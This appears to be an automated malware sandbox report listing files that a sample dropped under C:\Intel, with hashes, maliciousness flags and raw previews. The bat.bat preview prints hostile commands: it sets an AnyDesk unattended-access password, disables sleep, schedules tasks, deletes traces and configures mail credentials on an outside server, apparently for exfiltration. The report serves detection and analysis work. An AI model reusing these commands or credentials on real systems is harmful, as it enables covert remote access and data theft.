                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L....X.f.........."......*...0Q..T%..........@....@...........................v......Q...@...................................................................v.......%..............................................................................text...w(.......*.................. ..`.itext...T%..@...........................rdata........%.....................@..@.data....&Q...%..$Q..2..............@....reloc........v......VQ.............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\AnyDesk\bat.bat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):4477
                                                                                                                                                                  Entropy (8bit):5.593790126561728
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:q1vXYC+yNyQPvvpvXevWvlMz/vSdvX2vSdvXQZvSdvXKvSdvXmvSdvXZvSdvXnvl:qfloQhNM9ziOjvOjo+OjNOjwxDejO
                                                                                                                                                                  MD5:2689DB9C78A508F99898CCE9A85F0632
                                                                                                                                                                  SHA1:A5FD7E67D46F4D2239C43101666DD0582367BD8D
                                                                                                                                                                  SHA-256:636D4F1E3DCF0332A815CE3F526A02DF3C4EF2890A74521D05D6050917596748
                                                                                                                                                                  SHA-512:57950BBBCFF7148F256028A6B9B19D2EC868612DE3431D5DC3BBBE61FAADDB8F61EAAA845491F97B73418E9C54DCCAA48D0B04BC32EEBEB5EEB16801C6323138
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Intel\AnyDesk\bat.bat, Author: Joe Security
                                                                                                                                                                  Preview:echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access..%SYSTEMDRIVE%\Intel\dc.exe /D..powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0..powercfg -change -standby-timeout-ac 0..powercfg -change -hibernate-timeout-ac 0..powercfg -h off..powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1..powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1..schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00..Powershell.exe -executionpolicy remotesigned -File %SYSTEMDRIVE%\Intel\AnyDesk\wol.ps1..del /q %SYSTEMDRIVE%\Intel\curl.exe..del /q %SYSTEMDRIVE%\Intel\Trays.rar..del /q %SYSTEMDRIVE%\Intel\svchost.exe..set mail-out=out@dragonfires.ru..set pass-out=TyU005d94y..set smtp=mail.dragonfires.ru..set mail-in=in@dragonfires.ru..%SYSTEMDRIVE%\Intel\driver.exe a -r -hplim

                                                                                                                                                                  C:\Intel\AnyDesk\bat.lnk

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\Yv24LkKBY6.exe
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Oct 20 04:16:03 2024, mtime=Sun Oct 20 04:16:03 2024, atime=Sun Oct 20 04:16:03 2024, length=984, window=hidenormalshowminimized
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1044
                                                                                                                                                                  Entropy (8bit):4.387954886555134
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:8+6YWsBQCZzCUVlWUFCqAZ4eUCyhLJ8Dhg5i4Uzm:8qQczVwwh1Gg5g
                                                                                                                                                                  MD5:B8BE9EF45895F58DB0B6BD0A73485C78
                                                                                                                                                                  SHA1:C6DB4B279AEC29FD6793EFF8DE6572B51E8D95B2
                                                                                                                                                                  SHA-256:C51A9243F7FB0ADBD5F3AC2B2C89070A06EAED928228C8FB385D1FAE933D920A
                                                                                                                                                                  SHA-512:85284D43698F531E921F027E4A20DD156A6CACC6B32D8C84A94C9EA1D64269A2EEF3FD5140BD4CCFEB17F76D9958B2320F291DB611C0A5C023784E743C30F3DC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:L..................F.... ....3.(."..tZ.(.".....(."..........................+....P.O. .:i.....+00.../C:\...................P.1.....TY.*..Intel.<......TYT%TY.*.....%....................S...I.n.t.e.l.....V.1.....TY.*..AnyDesk.@......TY.*TY.*....R,........................A.n.y.D.e.s.k.....V.2.....TY.* .bat.bat.@......TY.*TY.*....T,.....................I..b.a.t...b.a.t.......M...............3.......L...........65......System.C:\Intel\AnyDesk\bat.bat......\.b.a.t...b.a.t...C.:.\.I.n.t.e.l.\.A.n.y.D.e.s.k.`.......X.......vivobook.........................)........(..VY.................)........(..VY........U...1SPS.0..C..G.....sf"9...d............A.n.y.D.e.s.k. .(.C.:.\.I.n.t.e.l.).............1SPS0.%..G.....`...!................b.a.t...b.a.t............@....B.(.".......................=..................0.:.5.B.=.K.9. .D.0.9.;. .W.i.n.d.o.w.s............@......(."......a...1SPS.jc(=.......O...E................C.:.\.I.n.t.e.l.\.A.n.y.D.e.s.k.\.b.a.t...b.a.t.........9...1SPS..mD..pH.H@..

                                                                                                                                                                  C:\Intel\AnyDesk\wol.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):670
                                                                                                                                                                  Entropy (8bit):5.478658113796959
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:MGNvQnzxGN9feGNcjtesqhIYQGN8dYohAUs219217Sj2XnoKG/91WYP:HNv2zAN9BNies+3NPGAUsc9K22XoKIZ
                                                                                                                                                                  MD5:E956E6CF8F57E5FCDD02B7F5137E312E
                                                                                                                                                                  SHA1:0DA79D573FADEF08C9D07F20D4BF8445A7044A48
                                                                                                                                                                  SHA-256:01793E6F0D5241B33F07A3F9AD34E40E056A514C5D23E14DC491CEE60076DC5A
                                                                                                                                                                  SHA-512:D4CF36F08B4F1CE033FE092E226454AAFA90C7652DDBF4FD2F014BF1B5438DC3035640A7C1BBE8B97D0F1A8AD726AAC2986E4C6B246A49AB55C434709606835F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"..$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"..$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest..# ........ ........ ........$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun..# ........... ...... . ............ .........Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

                                                                                                                                                                  C:\Intel\Trays.rar

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\curl.exe
                                                                                                                                                                  File Type:RAR archive data, flags: EncryptedBlockHeader
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):1759948
                                                                                                                                                                  Entropy (8bit):7.999902098352645
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:49152:96t7FF7chGiS1KBSsPLFBLPGUATnGvvGkbouz6pn/aJ3:4NFVEPSwSsPH+TnGvukEF5/w3
                                                                                                                                                                  MD5:3B9BD9271887C92A994C582161700FC8
                                                                                                                                                                  SHA1:54E78156E451F901FD6BDB9B7C93FDFDC105361A
                                                                                                                                                                  SHA-256:5707A7D5A6946D50E861EEA4FB89BF255239D0391E4AE87A499558EE85367061
                                                                                                                                                                  SHA-512:FC9ECE7AD3499BD9CB5CEFB3006D3BAFD3ACB58EF226FE0CE7AC65B31ECD50294E6B791A3A1B6ECE833FAD0B821DC42AAE12A1321FD89252562D0CD186E139F4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Rar!....s...........;..]......6,.,:..k*.....Qr.6;h...BqS..^{M.......8B!...W...z...)3p....>......f..!.Z..j.)J.....(zw.>...`.e$p7.9.Y.*..C1`..a5..Y.+s.....8y....$l.C..vP.....Od.m?;F.....T.J.............%0.q.J2...b[`.RG.m..Et......%.hL.4L..>L....P.y ..64=.....Bq........;A...1..f.4....Hfn.....E}d.....bG ...L.k...v.N..'&k.3..euw...@.1t.......`}.V.P.0...+.&H}.A..Z`..2..j....$v..v.2N^....0...5?....t.@....A_....h..!....w..X3m:V........'3`.5...n.,....h.//..~g%.\.'x?-/..[.............b....O.Y.i....B*.. ...e.)A2..D......9.98...e......._.....E.....DT..K>n.F/....o....5..,.... ..b.j.n..{D...Bd.2.u....s..[Jj8."E.2`..#._.3O..H^./...Fj-mk.......P.Z9.5.{..TJ..........O@M.&...<W|...<....h.-..4C..z4)...u...&..9...v...!t.7.......,..X._<"bx.Nf.C~.....v...R8N..Ha8$9l...*.+................vL.*&..=K.L ..G..V..........Yj>?U.\...e .\e.<h.!k....<......... .(.c.]Z...+.a..}.h.x.|G\..Rf...........Un.>n.E.F..6h.E..O/;T.@n.RS#O.E.......d.......s.....~./...A6....

                                                                                                                                                                  C:\Intel\Trays\4t-min.chm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows HtmlHelp Data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):221585
                                                                                                                                                                  Entropy (8bit):7.950121298763784
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:afX5wlsLWmmJ5c9xKwN+kgRrCgvqZtYFkgS/:R2Wm/9xKTfru
                                                                                                                                                                  MD5:B271C0CC26ADA59F204E567DAA150769
                                                                                                                                                                  SHA1:744CF9F7F6FA12748529923C0E8A221F7F9CDC3D
                                                                                                                                                                  SHA-256:2A5E806589E54C290393BB92EBBC1649B979A384A0CC0C52A229F62F394E29FE
                                                                                                                                                                  SHA-512:D240AD89B3413C7B090B7CC12110D9C44B8BABBC7140C3AD43318CF56CB1BA6777BE36318028562E8C25BC6380AC3A9404815A1F0CDD28E8BCD47760413C6237
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:ITSF....`........|........|.{.......".....|.{......."..`...............x.......T........................a..............ITSP....T...........................................j..].!......."..T...............PMGLw................/..../#IDXHDR...9.../#ITBITS..../#IVB.....<./#STRINGS.....E./#SYSTEM....A./#TOPICS...9.../#URLSTR...Y.3./#URLTBL...9. ./#WINDOWS...3.L./$FIftiMain...[..^./$OBJINST.....?./$WWAssociativeLinks/..../$WWAssociativeLinks/BTree...e.L./$WWAssociativeLinks/Data...1.1./$WWAssociativeLinks/Map...b../$WWAssociativeLinks/Property...| ./$WWKeywordLinks/..../$WWKeywordLinks/BTree...;.L./$WWKeywordLinks/Data......./$WWKeywordLinks/Map....*./$WWKeywordLinks/Property...E ./4t-min.hhc...N.8./4t-min.hhk......../4t-tray-menu.png.....G./4t_niagara_softw.html...B."./default.css...I.j./favoritesautomatically.html...d.e./favoritesgeneral.html...I.../favoriteshiding.html...Z.C./favoriteskeyboard.html.....(./favoriteslaunching.html...E.../favoritesoverview.html...R.S./favoritestitlebar.html

                                                                                                                                                                  C:\Intel\Trays\4t-min64.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):275968
                                                                                                                                                                  Entropy (8bit):5.377292337480563
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:GFhscoM/x/zeyFb2GP3zYkkisbL57SUp5Er/h36gMqE1Kwx57fjHGiRObXeHtOp8:Qhxz7Fbf3zYkkisbL9WDc4AyOHWy
                                                                                                                                                                  MD5:7BC3AEEDC18717D796F1C7FF8DBF0C17
                                                                                                                                                                  SHA1:94F5AB71D7EBDCF339C33820D1AAD0DB5B6998BF
                                                                                                                                                                  SHA-256:D7AF4E205E963B0C17330B7559CD7AA7BFABEE7E0F5F8A3F815CC2BB5F659201
                                                                                                                                                                  SHA-512:F6A2E99DE788C6869DC7AA6CB24A4D8BD72F1D9145CC2194CAAD9BF2242A88A69E73FC05F2D826956FE3E553B368C33295E16BF4CCA3723A6491C51D8AAC196D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: eqRHH2whJu.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: eqRHH2whJu.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....0W........../......f....................@.............................................................................................p.......................................................................................................................text....d.......f.................. .P`.data...............j..............@.P..bss....`,...@........................P..idata.......p......."..............@.0..rsrc................2..............@.@.........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\4t-min_pad.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (415), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14387
                                                                                                                                                                  Entropy (8bit):5.329785287143663
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:mm9lrTU1lo45jRukIB7Bq0KoWxDgJOPFK2NDO2ffo03+HZRiZAD0dh+fnh4RFKCc:juwlkoWxDgEFKUOMgmmsbm
                                                                                                                                                                  MD5:930B9A47D3982A556750F4993EBB7490
                                                                                                                                                                  SHA1:AAAEACB33638DE4C0A07CBD711272A3A91DC2F8C
                                                                                                                                                                  SHA-256:B20D63355A0427FC4E7CE80B10CED6B05FF1BCF6221E3F6D92348F15AFB7C02A
                                                                                                                                                                  SHA-512:4CFF22DDFFFCAFED36FF92A410466E88914F8F22ED782D927E01ED336661432CF602E5D4D14DA1BC2DFA706490E9AD631F62785D21E05CD5693D1B11787A7BA7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<?xml version='1.0'?>..<XML_DIZ_INFO>...<MASTER_PAD_VERSION_INFO>....<MASTER_PAD_VERSION>3.11</MASTER_PAD_VERSION>....<MASTER_PAD_EDITOR>PADGen 3.1.1.51 http://www.padgen.org</MASTER_PAD_EDITOR>....<MASTER_PAD_INFO>Portable Application Description, or PAD for short, is a data set that is used by shareware authors to disseminate information to anyone interested in their software products. To find out more go to http://pad.asp-software.org</MASTER_PAD_INFO>...</MASTER_PAD_VERSION_INFO>...<Company_Info>....<Company_Name>4t Niagara Software</Company_Name>....<Address_1/>....<Address_2/>....<City_Town/>....<State_Province/>....<Zip_Postal_Code/>....<Country/>....<Company_WebSite_URL>http://www.4t-niagara.com</Company_WebSite_URL>....<Contact_Info>.....<Author_First_Name>Support Team</Author_First_Name>.....<Author_Last_Name>4t Niagara Software</Author_Last_Name>.....<Author_Email>support@4t-niagara.com</Author_Email>.....<Contact_First_Name>Support Team</Contact_First_Name>.....<Contact_Las

                                                                                                                                                                  C:\Intel\Trays\7z.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):274944
                                                                                                                                                                  Entropy (8bit):6.424155263952795
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:LpbcrmVPgtC9M5OuGh9Srn152vIhsN9E61Nu:LpQMgtC9mrnr2vIhsk67
                                                                                                                                                                  MD5:3CD9F4853B93DB6331C9F34BC5671407
                                                                                                                                                                  SHA1:7D57E6F33DA5D885198A1AD88355D4F48979D1EB
                                                                                                                                                                  SHA-256:9532AC334F37954C8FA781489B52B113CDE746E8271D75516F419A3F13BAAD6B
                                                                                                                                                                  SHA-512:715DFCA8619E2C47E26223ADC0239B3F04C86977E27874693B8FC3A1600976D523458345D680C04754191EFDCD8CC412A7FF292A0F455C1D34EC75453CD48589
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: eqRHH2whJu.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: eqRHH2whJu.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*o;+n.Uxn.Uxn.Ux..[xw.UxX(_xP.Ux...xo.Uxn.Tx..Ux...xi.UxX(^x..Ux.x.xy.Ux.x.xl.Ux..Sxo.Ux..Qxo.UxRichn.Ux........PE..L...,..K...........!.....F...:......5........`..............................................................................$...P....`...........................#...................................................`..d............................text....D.......F.................. ..`.rdata...Y...`...Z...J..............@..@.data............>..................@....sxdata......P......................@....rsrc........`......................@..@.reloc...5.......6..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\File_id.diz

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):743
                                                                                                                                                                  Entropy (8bit):4.6472256555643465
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:M2Bx1LEnOwI2NJ2H75eRK/w/BPgq1UxlTtcWZkFnvN7J2a0xhRR+NkIH:9COFF1eI/Cb1UxpmFnqxHc5
                                                                                                                                                                  MD5:EE15025385638295CD8953EA45D876E0
                                                                                                                                                                  SHA1:940763F132EA201C6526AA298AF5FC910D542691
                                                                                                                                                                  SHA-256:5119725BA47E7DBF5CC8DD397D017391E2B135D9943CE380377F2A3D57458AF7
                                                                                                                                                                  SHA-512:3146F70ACD756FA565D57A33AC698DAF3D7DBE6DF1F5997D1D371325D2E662A0F718C21626FA3BD8A8A23FF03FC011B4D61F202EA7EA87AE27C6907BE285458A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..4t Tray Minimizer Pro 6.07..===============================....Minimize Outlook, IE, Firefox and any other applications to the system tray!....4t Tray Minimizer lets you running applications minimized as System..Tray icons, which helps in adjusting free space on your taskbar. To..minimize any application to the task bar, simply left click the..minimize button as usual or press keyboard shortcut. You can..configure 4t Tray Minimizer to automatically hide/restore specific ..applications by pressing specific keyboard shortcuts.......Copyright (C) 2001-2017, 4t Niagara Software....=============================================..http://www.4t-niagara.com..mailto:support@4t-niagara.com..=============================================....

                                                                                                                                                                  C:\Intel\Trays\ShellEh6055.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):56832
                                                                                                                                                                  Entropy (8bit):6.298588809941958
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:9258dMWwcuT9pU9TJ95v5xosGx/2H3llWQsmb8J/1Xc58JIyj4NtZ+QWdR8x:cwvHBxKKJ3ALMII7L+QWd2x
                                                                                                                                                                  MD5:0EB9F7FB524730F1B65CD926A55CBD70
                                                                                                                                                                  SHA1:4B6F96B4BC06303538F83AFA060E1AA0BDB3F7A9
                                                                                                                                                                  SHA-256:7061169B0C1EB3F0FB0EC9A2F82F9FEC8D813770EDDFA9DA059830619B431292
                                                                                                                                                                  SHA-512:515D665C30E5545D303D8A78B914CA34F126B34209314D59A16F37D41EC84BBC4909781F9A53E4548399AD89B0CC5CB4E28B6CE5536B5A6ECAA0F71F95171E83
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................6...... .............@..........................0.......................................... ...........................................................................................................................CODE....T........................... ..`DATA................................@...BSS......................................idata..............................@....edata.. ...........................@..P.reloc..............................@..P.rsrc...............................@..P.............0......................@..P................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\ShellEh6055x64.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):117304
                                                                                                                                                                  Entropy (8bit):5.610558322226675
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:jz88+cEaxHiFnUVl7BhPTrJ1gQXbL8caj+GdhfMkHqlOqugdo:j483BtfQQXbL8caj+gkMngdo
                                                                                                                                                                  MD5:395290BD5EB8BE9685394305CACA3ADF
                                                                                                                                                                  SHA1:85B9EA9BADE9658A949C1B95467A19A6E0968BD3
                                                                                                                                                                  SHA-256:9D91AAC2EC8A1526732A6D4AF9D5A83C5FCFB3B978A95678F486D71BDF26AD12
                                                                                                                                                                  SHA-512:2982B9EC2CA7FAA5263D9881B0FA36E1D898441B0EB96FB04239FED782044D6D03419989C0FB6117CE9C4066945DD9C6448B9A1637E228C7E3A440FDCAB8909A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....P...L...'...........................................@..........................................................(.................................... ..8....................................................................................text....P.......P.................. .P`.data....L...p...L...V..............@.P..bss.....'............................P..idata..............................@.0..edata..(.......(...................@.@@.rsrc...............................@.@@.reloc..8.... ..8...................@.P@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\Tray.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82432
                                                                                                                                                                  Entropy (8bit):6.288736444324739
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:50ZBlNKeoNdfYh54IlTayP6pP5sR8v1QI4zsWipcdwNL13v3gFq:5vsaIlT/Cpj1V4E4wNx3qq
                                                                                                                                                                  MD5:D7AE1BE3BDAEE1374B0A04E40B34CA51
                                                                                                                                                                  SHA1:34A4A45E9F5C86C00977565E1766F075DC2C8875
                                                                                                                                                                  SHA-256:5F45989E22E596BD8B5476E559ABE6E216CE446EAF79BB874C894DC938163240
                                                                                                                                                                  SHA-512:2E53A15C65F987E6CFEACB871A5A58D77B20D8263E92BACC6FCF5BA7D902283B2521541066CE42844B9C133AF3903205804C14433EA808F608C6731F7F85E3D2
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............[..[..[m$.[..[m$.[...[m$.[...[...Z..[...Z..[...Z..[.G"[..[..[...[...Z..[...Z..[...[..[...Z..[Rich..[........................PE..L......W...........!................J(....................................................@..........................$.......%..x....`..h....................p..L.......T...............................@............................................text............................... ..`.rdata...].......^..................@..@.data...P....0....... ..............@....shared.Q....@.......(..............@....gfids.......P.......*..............@..@.rsrc...h....`.......,..............@..@.reloc..L....p.......0..............@..B........................................................................................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\Trays.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2019840
                                                                                                                                                                  Entropy (8bit):6.439982548644594
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:hpIEX9g68K7LjloCbCqommOGV7t398lBvX:hh8ULjloAhm3V7wX
                                                                                                                                                                  MD5:90D208B856DEA18596D57FFB1DD3A867
                                                                                                                                                                  SHA1:7EE41EEADF39A001B6149738B874D998911055EF
                                                                                                                                                                  SHA-256:344DE5B82B337E49C0F30748E0BC74AFC1EBCF90DF4BD0EED5298B5CD57282D9
                                                                                                                                                                  SHA-512:ADECDD534F3A7EA3B409186FC60385EFC7C04BD12EDDD8EE6D50E9FF87AFC79A84B94640B325938E8920762E30C059B92117C0D12B5C1F4DAD8DEC60E61438C1
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@...........................!.....Oj...........@...........................`...7...P..............................................................................................................CODE....0........................... ..`DATA.....R.......T..................@...BSS......X...............................idata...7...`...8..................@....tls....(................................rdata..............................@..P.reloc..T...........................@..P.rsrc........P......................@..P..............!......\ .............@..P........................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\Trays.lnk

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sun Oct 6 11:03:06 2024, mtime=Sun Oct 6 11:04:28 2024, atime=Tue Aug 8 16:22:26 2017, length=2019840, window=hidenormalshowminimized
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1036
                                                                                                                                                                  Entropy (8bit):4.372618772871116
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:8lWHyM0sXXHg2XIGNrDHjestc/YEyGGVagVgHhfJILPri82ctejOqQAVQE6Um5:8Y9HHgwIEjlajNGPuBfJIiYteBT5zm
                                                                                                                                                                  MD5:919F64751F2164821A33CF02079E446D
                                                                                                                                                                  SHA1:A13BA175D24AE2AECF78FEFD70D96B8B0C3A5537
                                                                                                                                                                  SHA-256:B9702AB266717FDF1AB946E2F4253F67AAAC3A4DB3BC8BD71145C250997334B3
                                                                                                                                                                  SHA-512:B0D74D7A53D558595CD2243F79234F52B8F74BDB1AF1451CA0682C13616E1F4777B4D280CE929AB77EE8033F4C7B4A8A5B64BD7113F8C99CD97447CBAE6EC79D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:L..................F.... ...p.$..............5z.j...........................+....P.O. .:i.....+00.../C:\...................P.1.....FYc`..Intel.<......FY.]FYc`............................Y.I.n.t.e.l.....P.1.....FY.`..Trays.<......FY.]FY.`..........................jK..T.r.a.y.s.....\.2......K. .Trays.exe.D......FYd`FYd`....w ........................T.r.a.y.s...e.x.e.......M...............3.......L...........65......System.C:\Intel\Trays\Trays.exe......\.T.r.a.y.s...e.x.e...C.:.\.I.n.t.e.l.\.T.r.a.y.s...-.t.r.a.y.`.......X.......vivobook.........................W........(..VY.................W........(..VY........Q...1SPS.0..C..G.....sf"5...d............T.r.a.y.s. .(.C.:.\.I.n.t.e.l.).............1SPS0.%..G.....`...%................T.r.a.y.s...e.x.e............@....f...........................)..................@.8.;.>.6.5.=.8.5..............@....5z.j.......a...1SPS.jc(=.......O...E................C.:.\.I.n.t.e.l.\.T.r.a.y.s.\.T.r.a.y.s...e.x.e.........9...1SPS..mD..pH.H@..=x.....h

                                                                                                                                                                  C:\Intel\Trays\Whatsnew.txt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1622
                                                                                                                                                                  Entropy (8bit):4.899410686748101
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:lS2HOIQ3WN/SE8VFLskLb7RuGnPJgsGb4xC5V4ylVFk:tuI62/BID3lumPJEx5V4y/O
                                                                                                                                                                  MD5:09FE429955CDD00C8204694A12FC61E0
                                                                                                                                                                  SHA1:A7F9F4DAAA05E9352A9BD2B240F74EA42C11BCAD
                                                                                                                                                                  SHA-256:F19A02D60EED8BFE9844D815766C3B7A9D73BE6465BD7773746A27F39EF89A3A
                                                                                                                                                                  SHA-512:6D49512F3E81F1ADEB14E42536FAA852154D81734FD6C9E77EAF83000CD3ED1B4BFD18EB694725ABE723B66E276C3B6EE4A25A34DBED8386B933BD8D23CFDBEA
                                                                                                                                                                  Malicious:false
